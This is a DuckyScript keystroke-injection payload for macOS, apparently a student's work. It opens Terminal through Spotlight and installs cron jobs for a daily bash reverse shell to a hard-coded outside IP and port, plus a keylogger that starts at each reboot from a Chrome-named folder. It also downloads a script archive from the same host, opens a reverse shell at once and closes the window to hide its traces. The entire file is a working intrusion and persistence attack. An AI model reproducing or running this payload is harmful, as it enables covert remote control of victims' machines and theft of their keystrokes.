REM spawns a reverse shell
REM Shrey Somaiya z5257343
REM 2 April 2020
REM Set default delay 200ms

DEFAULT_DELAY 2000


REM Command + Space ==> spotlight search
GUI SPACE

REM Search for termina
STRING terminal

ENTER

STRING bash

ENTER

REM enable background jobs
STRING set -m
ENTER

REM add reverse shell to cron

REM set the reverse shell to occur 11am every day
STRING {crontab -l; echo '0 11 * * * /bin/sh -c "/bin/bash -i > /dev/tcp/139.180.169.29/6996 0<&1 2>&1 &" && exit';} | crontab -
ENTER

REM set cron job for keylogger on reboot
STRING { crontab -l; echo '@reboot python3 ~/.config/Chrome/osx-keylogger.py'; } | crontab -
ENTER

REM download and unzip the scripts
STRING curl http://139.180.169.29:8000/scripts.zip --output ~/.config/Chrome/scripts.zip  
ENTER

REM spawns a reverse shell in background
STRING sh -c "/bin/bash -i > /dev/tcp/139.180.169.29/6996 0<&1 2>&1 &" && exit
ENTER

REM we were never here!
GUI w

ENTER
